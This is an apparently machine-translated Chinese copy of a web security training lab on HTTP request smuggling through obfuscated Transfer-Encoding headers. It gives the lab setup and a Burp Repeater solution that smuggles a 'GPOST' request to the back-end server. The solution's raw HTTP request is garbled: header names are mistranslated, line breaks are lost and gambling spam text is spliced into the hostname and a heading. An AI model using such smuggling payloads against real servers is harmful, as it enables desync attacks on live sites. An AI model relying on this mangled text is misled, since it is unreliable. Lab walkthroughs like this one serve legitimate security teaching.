实验室:http请求走私,使TE标题混淆
从业者
该实验室涉及前端和后端服务器,两台服务器以不同的方式处理重复的HTTP请求标头。前端服务器拒绝不使用GET或发布方法的请求。
要解决实验室,请将请求走私到后端服务器,以便后端服务器处理的下一个请求似乎使用该方法GPOST
。
提示
在请求走私攻击中,手动修复长度字段可能很棘手。我们的HTTP请求走私者Burp扩展旨在帮助。您可以通过BAPP商店安装它。
笔记
该实验室旨在展示背后的基本概念HTTP请求走私。如果你不断关注我们学习材料,我们还有更多的实验室,可以教您如何利用这些漏洞来进行一些高度攻击。
解决方案
在Burp Suite中,转到中继器菜单,并确保未选中“更新内容”选项。
使用Burp Repeater,两次发出以下请求:
post/http/1.1主机:您的lab-id.web-securbeplay体育能用吗ity-academy.net content-type:application/x-www-form-urlencoded content-engength:4转移编码:块转移 - 构造:cow 5c gpost:cow gpost gpost gpost/http/1.1 content-type:application/x-www-form-urlencoded内容长度:15 x = 1 0
笔记
您需要包括尾声\ r \ n \ r \ n
在决赛之后0.
。
第二个回应应该说:无法识别的方法GPOST
。
社区解决方案beplay维护得多久
迈克尔·索默(Michael Sommer)